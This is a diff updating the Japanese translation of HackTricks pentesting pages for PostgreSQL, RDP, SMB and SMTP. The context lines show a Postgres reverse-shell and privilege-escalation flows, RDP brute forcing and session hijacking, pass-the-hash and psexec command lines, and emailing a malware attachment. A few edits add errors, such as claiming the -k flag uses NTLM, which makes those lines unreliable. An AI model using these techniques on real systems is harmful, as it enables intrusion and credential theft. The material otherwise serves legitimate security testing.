+7. ステップ5の`payload.so`を`/tmp`ディレクトリにアップロードする
+8. サーバーを再起動するか、`SELECT pg_reload_conf()`クエリを呼び出してサーバー設定をリロードする
 9. 次のDB接続時に、リバースシェル接続を受け取ります。
 
 ## **Postgres Privesc**
@@ -526,9 +530,9 @@ gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so
 
 #### **Grant**
 
-[**ドキュメント**](https://www.postgresql.org/docs/13/sql-grant.html)によると: _**`CREATEROLE`** 権限を持つロールは、**スーパーユーザー**でない任意のロールへのメンバーシップを**付与または取り消すことができます**。_
+[**ドキュメント**](https://www.postgresql.org/docs/13/sql-grant.html)によると: _**`CREATEROLE`** 権限を持つロールは、**スーパーユーザー**でない任意のロールへのメンバーシップを**付与または取り消す**ことができます。_
 
-したがって、**`CREATEROLE`** 権限を持っている場合、他の**ロール**(スーパーユーザーでない)へのアクセスを付与することができ、ファイルの読み書きやコマンドの実行のオプションを得ることができます:
+したがって、**`CREATEROLE`** 権限を持っている場合は、他の**ロール**(スーパーユーザーでない)へのアクセスを付与することができ、ファイルの読み書きやコマンドの実行のオプションを得ることができます:
 ```sql
 # Access to execute commands
 GRANT pg_execute_server_program TO username;
@@ -537,9 +541,9 @@ GRANT pg_read_server_files TO username;
 # Access to write files
 GRANT pg_write_server_files TO username;
 ```
-#### パスワードの変更
+#### Modify Password
 
-この役割を持つユーザーは、他の**非スーパーユーザー**の**パスワード**を**変更**することもできます:
+この役割を持つユーザーは、他の**非スーパーユーザー**の**パスワード**を**変更**することもできます:
 ```sql
 #Change password
 ALTER USER user_name WITH PASSWORD 'new_password';
@@ -564,7 +568,7 @@ COPY (select '') to PROGRAM 'psql -U  -c "ALTER USER 
 
 ### **ALTER TABLE privesc**
 
-[**この書き込み**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)では、ALTER TABLE権限をユーザーに付与することでPostgres GCPで**privesc**が可能になった方法が説明されています。
+[**この書き込み**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)では、ALTER TABLE権限をユーザーに付与することでPostgres GCPで**privesc**が可能だった方法が説明されています。
 
 **別のユーザーをテーブルの所有者にする**ことを試みると、**エラー**が発生してそれを防ぐはずですが、どうやらGCPはその**オプションを非スーパーユーザーのpostgresユーザーに与えた**ようです:
 
@@ -576,12 +580,12 @@ GetUserIdAndSecContext(&save_userid, &save_sec_context);
 SetUserIdAndSecContext(onerel->rd_rel->relowner,
 save_sec_context | SECURITY_RESTRICTED_OPERATION);
 ```
-#### Exploitation
+#### エクスプロイト
 
 1. 新しいテーブルを作成します。
 2. インデックス関数にデータを提供するために、テーブルにいくつかの無関係なコンテンツを挿入します。
 3. コード実行ペイロードを含む悪意のあるインデックス関数を開発し、無許可のコマンドを実行できるようにします。
-4. テーブルの所有者を「cloudsqladmin」にALTERします。これは、Cloud SQLがデータベースを管理および維持するために専用のGCPのスーパーユーザーロールです。
+4. テーブルの所有者を「cloudsqladmin」にALTERします。これは、Cloud SQLがデータベースを管理および維持するために専用に使用するGCPのスーパーユーザーロールです。
 5. テーブルにANALYZE操作を実行します。このアクションにより、PostgreSQLエンジンはテーブルの所有者「cloudsqladmin」のユーザーコンテキストに切り替わります。その結果、悪意のあるインデックス関数が「cloudsqladmin」の権限で呼び出され、以前は無許可だったシェルコマンドの実行が可能になります。
 
 PostgreSQLでは、このフローは次のようになります:
@@ -624,7 +628,7 @@ dbname=somedb',
 RETURNS (result TEXT);
 ```
 > [!WARNING]
-> 注意してください、前のクエリが機能するためには**`dblink`関数が存在する必要があります**。存在しない場合は、次のコマンドで作成を試みることができます。
+> 注意してください、前のクエリが機能するためには**`dblink`関数が存在する必要があります**。存在しない場合は、次のように作成を試みることができます。
 >
 > ```sql
 > CREATE EXTENSION dblink;
@@ -665,7 +669,7 @@ PERFORM dblink_disconnect();
 …
 

 
-[**ドキュメントで説明されているように**](https://www.postgresql.org/docs/current/sql-createfunction.html)、**SECURITY DEFINERを持つ関数は**、**それを所有するユーザーの権限で実行されます**。したがって、関数が**SQLインジェクションに対して脆弱である**か、**攻撃者によって制御されるパラメータで特権的なアクションを実行している**場合、それを悪用して**Postgres内で権限を昇格させる**ことができます。
+[**ドキュメントで説明されているように**](https://www.postgresql.org/docs/current/sql-createfunction.html)、**SECURITY DEFINERを持つ関数は**、**それを所有するユーザーの権限で実行されます**。したがって、関数が**SQLインジェクションに対して脆弱である**か、**攻撃者によって制御されるパラメータで特権的なアクションを行っている**場合、それを悪用して**Postgres内で権限を昇格させる**ことができます。
 
 前のコードの4行目に、関数が**SECURITY DEFINER**フラグを持っていることがわかります。
 ```sql
@@ -679,7 +683,7 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
 
 ### PL/pgSQLによるパスブルートフォース
 
-**PL/pgSQL**は、SQLに比べてより高度な手続き制御を提供する**完全なプログラミング言語**です。これにより、プログラムのロジックを強化するために**ループ**やその他の**制御構造**を使用できます。さらに、**SQL文**や**トリガー**は、**PL/pgSQL言語**を使用して作成された関数を呼び出すことができます。この統合により、データベースプログラミングと自動化に対するより包括的で多様なアプローチが可能になります。\
+**PL/pgSQL**は、SQLに比べてより高度な手続き制御を提供する**完全なプログラミング言語**です。これにより、プログラムロジックを強化するために**ループ**やその他の**制御構造**を使用できます。さらに、**SQL文**や**トリガー**は、**PL/pgSQL言語**を使用して作成された関数を呼び出すことができます。この統合により、データベースプログラミングと自動化に対するより包括的で多様なアプローチが可能になります。\
 **この言語を悪用して、PostgreSQLにユーザーの資格情報をブルートフォースさせることができます。**
 
 {{#ref}}
@@ -691,7 +695,7 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
 > [!TIP]
 > 次の特権昇格ベクターは、すべてのステップがネストされたSELECT文を通じて実行できるため、制約のあるSQLiコンテキストで特に便利です。
 
-PostgreSQLサーバーファイルを**読み書き**できる場合、内部の`pg_authid`テーブルに関連付けられたPostgreSQLのディスク上のファイルノードを上書きすることで**スーパーユーザー**になることができます。
+**PostgreSQLサーバーファイルを読み書きできる**場合、内部の`pg_authid`テーブルに関連付けられたPostgreSQLのディスク上のファイルノードを上書きすることで**スーパーユーザー**になることができます。
 
 **この技術**についての詳細は[**こちら**](https://adeadfed.com/posts/updating-postgresql-data-without-update/)**を参照してください。**
 
@@ -704,7 +708,7 @@ PostgreSQLサーバーファイルを**読み書き**できる場合、内部の
 5. [PostgreSQLファイルノードエディタ](https://github.com/adeadfed/postgresql-filenode-editor)を使用して[ファイルノードを編集](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table)し、すべての`rol*`ブールフラグを1に設定して完全な権限を付与します。
 6. `lo_*`関数を介して編集したファイルノードを再アップロードし、ディスク上の元のファイルを上書きします。
 7. _(オプション)_ 高コストのSQLクエリを実行してメモリ内のテーブルキャッシュをクリアします。
-8. これで、フルスーパーユーザーの権限を持つことになります。
+8. これで、フルスーパーメンバーの権限を持つことになります。
 
 ## **POST**
 ```
@@ -716,7 +720,7 @@ msf> use exploit/windows/postgres/postgres_payload
 ```
 ### logging
 
-_inside the **postgresql.conf**_ ファイル内で、次のように変更することで postgresql ログを有効にできます:
+_**postgresql.conf**_ ファイル内で、次のように変更することで postgresql ログを有効にできます:
 ```bash
 log_statement = 'all'
 log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md
index 4ece8e8b7..284c7bcb8 100644
--- a/src/network-services-pentesting/pentesting-rdp.md
+++ b/src/network-services-pentesting/pentesting-rdp.md
@@ -2,7 +2,6 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-
 ## 基本情報
 
 Microsoftによって開発された**Remote Desktop Protocol**(**RDP**)は、ネットワークを介してコンピュータ間のグラフィカルインターフェース接続を可能にするように設計されています。この接続を確立するために、ユーザーは**RDP**クライアントソフトウェアを利用し、同時にリモートコンピュータは**RDP**サーバーソフトウェアを操作する必要があります。このセットアップにより、遠隔コンピュータのデスクトップ環境をシームレスに制御およびアクセスでき、実質的にそのインターフェースをユーザーのローカルデバイスに持ち込むことができます。
@@ -33,7 +32,7 @@ crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
 # hydra
 hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
 ```
-### 知られている資格情報/ハッシュで接続する
+### 知っている資格情報/ハッシュで接続する
 ```bash
 rdesktop -u  
 rdesktop -d  -u  -p  
@@ -60,7 +59,7 @@ query user
 ```bash
 tscon  /dest:
 ```
-今、選択したRDPセッションに入っており、Windowsのツールと機能のみを使用してユーザーをなりすますことができます。
+今、選択したRDPセッションに入っており、Windowsのツールと機能のみを使用してユーザーを偽装することができます。
 
 **重要**: アクティブなRDPセッションにアクセスすると、そのセッションを使用していたユーザーが切断されます。
 
@@ -81,7 +80,7 @@ ts::remote /id:2    #Connect to the session
 
 ### RDPプロセスインジェクション
 
-異なるドメインの誰かが**より高い権限でRDP経由で**あなたが管理者であるPCにログインした場合、彼の**RDPセッションプロセス**にあなたのビーコンを**インジェクト**して、彼のように行動することができます:
+異なるドメインの誰かが**より良い権限でRDP経由**で**あなたが管理者**であるPCにログインした場合、彼の**RDPセッションプロセス**にあなたのビーコンを**インジェクト**し、彼のように行動することができます:
 
 {{#ref}}
 ../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
@@ -95,18 +94,18 @@ net localgroup "Remote Desktop Users" UserLoginName /add
 
 - [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
 
-**AutoRDPwn**は、主にMicrosoft Windowsコンピュータに対する**Shadow**攻撃を自動化するために設計されたPowershellで作成されたポストエクスプロイトフレームワークです。この脆弱性(Microsoftによって機能としてリストされています)は、リモート攻撃者が**被害者の同意なしにデスクトップを表示し**、さらには要求に応じてそれを制御することを可能にします。これは、オペレーティングシステム自体にネイティブなツールを使用します。
+**AutoRDPwn**は、主にMicrosoft Windowsコンピュータに対する**Shadow**攻撃を自動化するために設計されたPowershellで作成されたポストエクスプロイテーションフレームワークです。この脆弱性(Microsoftによって機能としてリストされています)は、リモート攻撃者が**被害者のデスクトップを同意なしに表示し**、さらには要求に応じて制御することを可能にします。これは、オペレーティングシステム自体にネイティブなツールを使用します。
 
 - [**EvilRDP**](https://github.com/skelsec/evilrdp)
 - コマンドラインから自動的にマウスとキーボードを制御
 - コマンドラインから自動的にクリップボードを制御
-- クライアントからSOCKSプロキシを生成し、RDPを介してターゲットへのネットワーク通信をチャネル
+- RDPを介してターゲットへのネットワーク通信をチャネルするクライアントからSOCKSプロキシを生成
 - ファイルをアップロードせずにターゲット上で任意のSHELLおよびPowerShellコマンドを実行
 - ターゲットでファイル転送が無効になっている場合でも、ターゲットとの間でファイルをアップロードおよびダウンロード
 
 - [**SharpRDP**](https://github.com/0xthirteen/SharpRDP)
 
-このツールは、**グラフィカルインターフェースを必要とせずに**被害者のRDPでコマンドを実行することを可能にします。
+このツールは、被害者のRDPで**グラフィカルインターフェースを必要とせずに**コマンドを実行することを可能にします。
 
 ## HackTricks 自動コマンド
 ```
diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md
index f923f125a..6c3c89282 100644
--- a/src/network-services-pentesting/pentesting-smb/README.md
+++ b/src/network-services-pentesting/pentesting-smb/README.md
@@ -2,9 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **ポート 139**
+## **Port 139**
 
-_**ネットワーク基本入出力システム**_** (NetBIOS)** は、アプリケーション、PC、およびデスクトップがローカルエリアネットワーク (LAN) 内でネットワークハードウェアと相互作用し、**ネットワークを介したデータの送信を促進する**ために設計されたソフトウェアプロトコルです。NetBIOSネットワーク上で動作するソフトウェアアプリケーションの識別と位置は、最大16文字の長さを持ち、コンピュータ名とは異なることが多いNetBIOS名を通じて達成されます。2つのアプリケーション間のNetBIOSセッションは、1つのアプリケーション(クライアントとして機能)が**TCPポート139**を利用して、別のアプリケーション(サーバーとして機能)を「呼び出す」コマンドを発行することで開始されます。
+_**ネットワーク基本入出力システム**_** (NetBIOS)** は、アプリケーション、PC、およびデスクトップがローカルエリアネットワーク (LAN) 内でネットワークハードウェアと相互作用し、**ネットワークを介してデータの送信を促進する**ために設計されたソフトウェアプロトコルです。NetBIOSネットワーク上で動作するソフトウェアアプリケーションの識別と位置特定は、最大16文字の長さを持ち、コンピュータ名とは異なることが多いNetBIOS名を通じて行われます。2つのアプリケーション間のNetBIOSセッションは、1つのアプリケーション(クライアントとして機能)が**TCPポート139**を利用して、別のアプリケーション(サーバーとして機能)を「呼び出す」コマンドを発行することで開始されます。
 ```
 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
 ```
@@ -12,15 +12,15 @@ _**ネットワーク基本入出力システム**_** (NetBIOS)** は、アプ
 
 技術的には、ポート 139 は「NBT over IP」と呼ばれ、ポート 445 は「SMB over IP」として識別されます。略語 **SMB** は「**Server Message Blocks**」の略で、現代では **Common Internet File System (CIFS)** としても知られています。アプリケーション層のネットワークプロトコルとして、SMB/CIFS は主にファイル、プリンター、シリアルポートへの共有アクセスを可能にし、ネットワーク上のノード間のさまざまな通信形態を促進するために利用されます。
 
-例えば、Windows の文脈では、SMB が TCP/IP 上で直接動作できることが強調されており、ポート 445 を利用することで TCP/IP 上の NetBIOS の必要性が排除されます。逆に、異なるシステムではポート 139 の使用が観察され、SMB が TCP/IP 上の NetBIOS と共に実行されていることを示しています。
+例えば、Windows の文脈では、SMB は TCP/IP 上で直接動作できることが強調されており、ポート 445 を利用することで TCP/IP 上の NetBIOS の必要性が排除されます。逆に、異なるシステムではポート 139 の使用が観察され、SMB が TCP/IP 上の NetBIOS と共に実行されていることを示しています。
 ```
 445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
 ```
 ### SMB
 
-**Server Message Block (SMB)**プロトコルは、**クライアント-サーバ**モデルで動作し、**ファイル**、ディレクトリ、およびプリンタやルータなどの他のネットワークリソースへの**アクセス**を規制するために設計されています。主に**Windows**オペレーティングシステムシリーズ内で利用され、SMBは後方互換性を確保し、Microsoftのオペレーティングシステムの新しいバージョンを搭載したデバイスが古いバージョンを実行しているデバイスとシームレスに相互作用できるようにします。さらに、**Samba**プロジェクトは、SMBの実装を**Linux**およびUnixシステムで可能にする無料のソフトウェアソリューションを提供し、SMBを通じたクロスプラットフォーム通信を促進します。
+**Server Message Block (SMB)**プロトコルは、**クライアント-サーバー**モデルで動作し、**ファイル**、ディレクトリ、およびプリンタやルータなどの他のネットワークリソースへの**アクセス**を規制するために設計されています。主に**Windows**オペレーティングシステムシリーズ内で利用され、SMBは後方互換性を確保し、新しいバージョンのMicrosoftオペレーティングシステムを搭載したデバイスが古いバージョンを実行しているデバイスとシームレスに相互作用できるようにします。さらに、**Samba**プロジェクトは、**Linux**およびUnixシステムでのSMBの実装を可能にする無料のソフトウェアソリューションを提供し、SMBを通じたクロスプラットフォーム通信を促進します。
 
-**ローカルファイルシステムの任意の部分**を表す共有は、SMBサーバーによって提供され、クライアントに対してサーバーの実際の構造とは部分的に**独立した**階層を表示します。**アクセス制御リスト (ACL)**は、**アクセス権**を定義し、**実行**、**読み取り**、および**フルアクセス**などの属性を含むユーザー権限に対する**細かい制御**を可能にします。これらの権限は、共有に基づいて個々のユーザーまたはグループに割り当てることができ、サーバー上のローカル権限とは異なります。
+**ローカルファイルシステムの任意の部分**を表す共有は、SMBサーバーによって提供され、クライアントに対してサーバーの実際の構造とは部分的に**独立した**階層を表示します。**アクセス制御リスト (ACL)**は、**アクセス権**を定義し、**`execute`**、**`read`**、および**`full access`**などの属性を含むユーザー権限に対する**細かい制御**を可能にします。これらの権限は、共有に基づいて個々のユーザーまたはグループに割り当てることができ、サーバー上のローカル権限とは異なります。
 
 ### IPC$ Share
 
@@ -32,7 +32,7 @@ IPC$共有へのアクセスは、匿名のヌルセッションを通じて取
 - 利用可能なSMB共有に関する情報
 - 有効なシステムセキュリティポリシー
 
-この機能は、ネットワーク管理者やセキュリティ専門家がネットワーク上のSMB(Server Message Block)サービスのセキュリティ状況を評価するために重要です。`enum4linux`は、ターゲットシステムのSMB環境の包括的なビューを提供し、潜在的な脆弱性を特定し、SMBサービスが適切に保護されていることを確認するために不可欠です。
+この機能は、ネットワーク管理者やセキュリティ専門家がネットワーク上のSMB (Server Message Block)サービスのセキュリティ状況を評価するために重要です。`enum4linux`は、ターゲットシステムのSMB環境の包括的なビューを提供し、潜在的な脆弱性を特定し、SMBサービスが適切に保護されていることを確認するために不可欠です。
 ```bash
 enum4linux -a target_ip
 ```
@@ -40,7 +40,7 @@ enum4linux -a target_ip
 
 ## NTLMとは
 
-NTLMが何であるか知らない場合や、その仕組みや悪用方法を知りたい場合は、**NTLM**に関するこのページが非常に興味深いでしょう。ここでは**このプロトコルの仕組みと、それを利用する方法が説明されています:**
+NTLMが何であるか知らない場合や、その動作や悪用方法を知りたい場合は、**NTLM**に関するこのページが非常に興味深いでしょう。ここでは**このプロトコルの動作とそれを利用する方法**が説明されています:
 
 {{#ref}}
 ../../windows-hardening/ntlm/
@@ -48,7 +48,7 @@ NTLMが何であるか知らない場合や、その仕組みや悪用方法を
 
 ## **サーバー列挙**
 
-### **ホストを検索するために**ネットワークをスキャン:
+### **ホストを検索するために**ネットワークをスキャンする:
 ```bash
 nbtscan -r 192.168.0.1/24
 ```
@@ -149,7 +149,7 @@ use auxiliary/scanner/smb/smb_lookupsid
 set rhosts hostname.local
 run
 ```
-### **LSARPCとSAMR rpcclientの列挙**
+### **LSARPCおよびSAMR rpcclientの列挙**
 
 {{#ref}}
 rpcclient-enumeration.md
@@ -197,7 +197,7 @@ smbmap -u "username" -p ":" [-r/-R] [Folder] -H  [-P ] #Pass-t
 ```
 ### **手動でWindows共有を列挙し、接続する**
 
-ホストマシンの共有を表示することが制限されている可能性があり、リストを表示しようとすると接続できる共有がないように見えることがあります。そのため、共有に手動で接続を試みる価値があるかもしれません。共有を手動で列挙するには、有効なセッション(例:ヌルセッションまたは有効な資格情報)を使用して、NT_STATUS_ACCESS_DENIEDやNT_STATUS_BAD_NETWORK_NAMEのような応答を探すと良いでしょう。これらは、共有が存在するがアクセスできないか、共有がまったく存在しないかを示す可能性があります。
+ホストマシンの共有を表示することが制限されている可能性があり、リストを表示しようとすると接続できる共有がないように見えることがあります。そのため、共有に手動で接続を試みる価値があるかもしれません。共有を手動で列挙するには、有効なセッション(例:ヌルセッションまたは有効な資格情報)を使用しているときに、NT_STATUS_ACCESS_DENIEDやNT_STATUS_BAD_NETWORK_NAMEのような応答を探すと良いでしょう。これらは、共有が存在するがアクセスできないか、共有がまったく存在しないかを示す可能性があります。
 
 Windowsターゲットの一般的な共有名は次のとおりです。
 
@@ -296,7 +296,7 @@ smbclient ///
 - prompt: ファイル名のプロンプトをオフに切り替えます (デフォルト: オン)
 - mget: ホストからクライアントマシンにマスクに一致するすべてのファイルをコピーします
 
-(_smbclientのmanページからの情報_)
+(_smbclientのマニュアルページからの情報_)
 
 ### ドメイン共有フォルダ検索
 
@@ -310,15 +310,15 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
 ```bash
 sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
 ```
-特に興味深いのは、**`Registry.xml`** というファイルで、これは **autologon** を使用して構成されたユーザーの **パスワード** を含む可能性があります。また、**`web.config`** ファイルも **資格情報** を含んでいます。
+特に興味深いのは、**`Registry.xml`** というファイルで、これは **autologon** を使用して構成されたユーザーの **パスワード** を含む可能性があります。また、**`web.config`** ファイルも **認証情報** を含んでいます。
 
-> [!NOTE]
-> **SYSVOL シェア** は、ドメイン内のすべての認証されたユーザーによって **読み取り可能** です。そこには、多くの異なるバッチ、VBScript、および PowerShell **スクリプト** が **見つかる** かもしれません。\
-> その中の **スクリプト** を **確認** するべきで、**パスワード** などの機密情報を **見つける** 可能性があります。
+> [!TIP]
+> **SYSVOL シェア** は、ドメイン内のすべての認証されたユーザーによって **読み取り可能** です。そこには、さまざまなバッチ、VBScript、および PowerShell **スクリプト** が **見つかる** かもしれません。\
+> その中の **スクリプト** を **確認** するべきです。なぜなら、**パスワード** などの機密情報を **見つける** 可能性があるからです。
 
 ## レジストリの読み取り
 
-発見した資格情報を使用して **レジストリを読み取る** ことができるかもしれません。Impacket **`reg.py`** を使用して試すことができます:
+発見した認証情報を使用して **レジストリを読み取る** ことができるかもしれません。Impacket **`reg.py`** を使用して試すことができます:
 ```bash
 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
@@ -378,7 +378,7 @@ crackmapexec smb  -d  -u Administrator -H  #Pass-The-Hash
 ```
 ### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
 
-両方のオプションは、**新しいサービスを作成します**(SMB経由で _\pipe\svcctl_ を使用)被害者のマシンで、これを使用して**何かを実行します**(**psexec**は**実行可能ファイルをADMIN$共有にアップロードし、**smbexec**は**cmd.exe/powershell.exe**を指し、引数にペイロードを入れます --**ファイルレス技術-**-)。\
+両方のオプションは、**新しいサービスを作成**します(SMB経由で_\pipe\svcctl_を使用)被害者のマシンで、これを使用して**何かを実行**します(**psexec**は実行可能ファイルをADMIN$共有に**アップロード**し、**smbexec**は**cmd.exe/powershell.exe**を指し、引数にペイロードを入れます --**ファイルレス技術-**-)。\
 **詳細情報**は[**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)と[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)を参照してください。\
 **kali**では、/usr/share/doc/python3-impacket/examples/にあります。
 ```bash
@@ -388,7 +388,7 @@ crackmapexec smb  -d  -u Administrator -H  #Pass-The-Hash
 psexec \\192.168.122.66 -u Administrator -p 123456Ww
 psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
 ```
-**パラメーター**`-k`を使用すると、**kerberos**に対して認証できます。 
+**パラメーター**`-k`を使用すると、**kerberos**に対して認証できます。代わりに**NTLM**を使用します。
 
 ### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
 
@@ -415,11 +415,11 @@ SMBを介してタスクスケジューラを使用してコマンドを実行
 ./atexec.py [[domain/]username[:password]@] "command"
 ./atexec.py -hashes  administrator@10.10.10.175 "whoami"
 ```
-## Impacket 参照
+## Impacketのリファレンス
 
 [https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
 
-## **ユーザー資格情報のブルートフォース**
+## **ユーザーの資格情報をブルートフォース攻撃する**
 
 **これは推奨されません。最大許可試行回数を超えるとアカウントがブロックされる可能性があります**
 ```bash
@@ -452,7 +452,7 @@ WindowsライブラリURLMon.dllは、ページがSMBを介してコンテンツ
 
 ## NTLM窃盗
 
-SMBトラッピングに似て、ターゲットシステムに悪意のあるファイルを植え付ける(例えばSMBを介して)は、SMB認証の試行を引き起こす可能性があり、NetNTLMv2ハッシュをResponderなどのツールで傍受することができます。ハッシュはオフラインでクラックするか、[SMBリレー攻撃](#smb-relay-attack)に使用できます。
+SMBトラッピングに似て、ターゲットシステムに悪意のあるファイルを植え付ける(例えばSMBを介して)は、SMB認証の試行を引き起こす可能性があり、NetNTLMv2ハッシュをResponderのようなツールで傍受することができます。ハッシュはオフラインでクラックするか、[SMBリレー攻撃](#smb-relay-attack)に使用できます。
 
 [参照: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
 
diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md
index 270c826f8..f346ede69 100644
--- a/src/network-services-pentesting/pentesting-smtp/README.md
+++ b/src/network-services-pentesting/pentesting-smtp/README.md
@@ -4,9 +4,9 @@
 
 ## **基本情報**
 
-**Simple Mail Transfer Protocol (SMTP)** は、**電子メールの送受信**に使用されるTCP/IPスイート内のプロトコルです。受信者側でメッセージをキューイングする際の制限により、SMTPはしばしば**POP3またはIMAP**と一緒に使用されます。これらの追加プロトコルは、ユーザーがサーバーメールボックスにメッセージを保存し、定期的にダウンロードすることを可能にします。
+**Simple Mail Transfer Protocol (SMTP)** は、**電子メールの送受信**に使用されるTCP/IPスイート内のプロトコルです。受信者側でのメッセージのキューイングに制限があるため、SMTPはしばしば**POP3またはIMAP**と一緒に使用されます。これらの追加プロトコルは、ユーザーがサーバーメールボックスにメッセージを保存し、定期的にダウンロードすることを可能にします。
 
-実際には、**電子メールプログラム**が**電子メールの送信にSMTPを使用し**、**受信にはPOP3またはIMAPを利用する**ことが一般的です。Unixベースのシステムでは、**sendmail**が電子メール目的で最も頻繁に使用されるSMTPサーバーとして際立っています。商用パッケージであるSendmailは、POP3サーバーを含んでいます。さらに、**Microsoft Exchange**はSMTPサーバーを提供し、POP3サポートを含めるオプションを提供しています。
+実際には、**電子メールプログラム**が**電子メールの送信にSMTPを使用し**、**受信にはPOP3またはIMAPを利用する**ことが一般的です。Unixベースのシステムでは、**sendmail**が電子メール目的で最も頻繁に使用されるSMTPサーバーとして際立っています。商用パッケージであるSendmailはPOP3サーバーを含んでいます。さらに、**Microsoft Exchange**はSMTPサーバーを提供し、POP3サポートを含めるオプションを提供しています。
 
 **デフォルトポート:** 25,465(ssl),587(ssl)
 ```
@@ -47,7 +47,7 @@ nmap -p25 --script smtp-open-relay 10.10.10.10 -v
 ```
 ### NTLM Auth - 情報漏洩
 
-サーバーがNTLM認証(Windows)をサポートしている場合、機密情報(バージョン)を取得できます。詳細は[**こちら**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666)をご覧ください。
+サーバーがNTLM認証(Windows)をサポートしている場合、機密情報(バージョン)を取得できます。詳細は[**こちら**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666)を参照してください。
 ```bash
 root@kali: telnet example.com 587
 220 example.com SMTP Server Banner
@@ -83,9 +83,9 @@ MAIL FROM: me
 ```
 ### スニッフィング
 
-ポート25へのパケットからパスワードをスニッフィングしているか確認してください。
+ポート25へのパケットからパスワードをスニッフィングできるか確認してください。
 
-### [Auth bruteforce](../../generic-hacking/brute-force.md#smtp)
+### [認証ブルートフォース](../../generic-hacking/brute-force.md#smtp)
 
 ## ユーザー名ブルートフォース列挙
 
@@ -150,11 +150,11 @@ Nmap: nmap --script smtp-enum-users 
 ```
 ## DSNレポート
 
-**配信状況通知レポート**: 組織に**無効なアドレス**に**メール**を送信すると、組織はそのアドレスが無効であることを通知し、**あなたにメールを返送**します。返送されたメールの**ヘッダー**には、可能な**機密情報**(レポートとやり取りしたメールサービスのIPアドレスやアンチウイルスソフトウェアの情報など)が**含まれます**。
+**配信状況通知レポート**: 組織に**無効なアドレス**に**メール**を送信すると、組織はそのアドレスが無効であることを通知し、**あなたにメールを返送**します。返送されたメールの**ヘッダー**には、報告に関与したメールサービスの**IPアドレス**やアンチウイルスソフトウェアの情報など、可能な**機密情報**が**含まれます**。
 
 ## [コマンド](smtp-commands.md)
 
-### Linuxコンソールからメールを送信する
+### Linuxコンソールからのメール送信
 ```bash
 sendEmail -t to@domain.com -f from@attacker.com -s  -u "Important subject" -a /tmp/malware.pdf
 Reading message body from STDIN because the '-m' option was not used.
@@ -217,9 +217,9 @@ print("[***]successfully sent email to %s:" % (msg['To']))
 ```
 
 
-## SMTP スマグリング
+## SMTPスムーグリング
 
-SMTP スマグリングの脆弱性により、すべての SMTP 保護をバイパスすることが可能でした(保護に関する詳細は次のセクションを参照してください)。SMTP スマグリングの詳細については、以下を確認してください:
+SMTPスムーグリングの脆弱性により、すべてのSMTP保護をバイパスすることが可能でした(保護に関する詳細は次のセクションを参照してください)。SMTPスムーグリングの詳細については次を確認してください:
 
 {{#ref}}
 smtp-smuggling.md
@@ -227,47 +227,47 @@ smtp-smuggling.md
 
 ## メールスプーフィング対策
 
-組織は、SMTP メッセージのスプーフィングの容易さから、**SPF**、**DKIM**、および **DMARC** を採用することで、無許可のメールが自分たちの名義で送信されるのを防ぎます。
+組織は、SMTPメッセージのスプーフィングの容易さから、**SPF**、**DKIM**、および**DMARC**を使用することで、無許可のメールが自分たちの名義で送信されるのを防ぎます。
 
-**これらの対策に関する完全なガイド**は、[https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/) で入手できます。
+**これらの対策に関する完全なガイド**は[https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/)で入手できます。
 
 ### SPF
 
 > [!CAUTION]
-> SPF [は2014年に「非推奨」とされました](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。これは、`_spf.domain.com` に **TXT レコード**を作成するのではなく、**同じ構文**を使用して `domain.com` に作成することを意味します。\
-> さらに、以前の SPF レコードを再利用するために、`"v=spf1 include:_spf.google.com ~all"` のようなものを見つけることはよくあります。
+> SPF [は2014年に「非推奨」とされました](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。これは、`_spf.domain.com`に**TXTレコード**を作成する代わりに、**同じ構文**を使用して`domain.com`に作成することを意味します。\
